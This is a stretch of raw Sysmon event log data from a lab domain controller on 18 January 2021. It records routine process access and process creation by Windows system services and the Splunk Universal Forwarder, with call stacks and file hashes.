13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.272{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.803{59A5CD1D-9274-6005-B904-00000000A301}45124928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.662{59A5CD1D-9274-6005-B904-00000000A301}4512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:48.131{59A5CD1D-9273-6005-B804-00000000A301}34603900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9275-6005-BA04-00000000A301}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:49.896{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 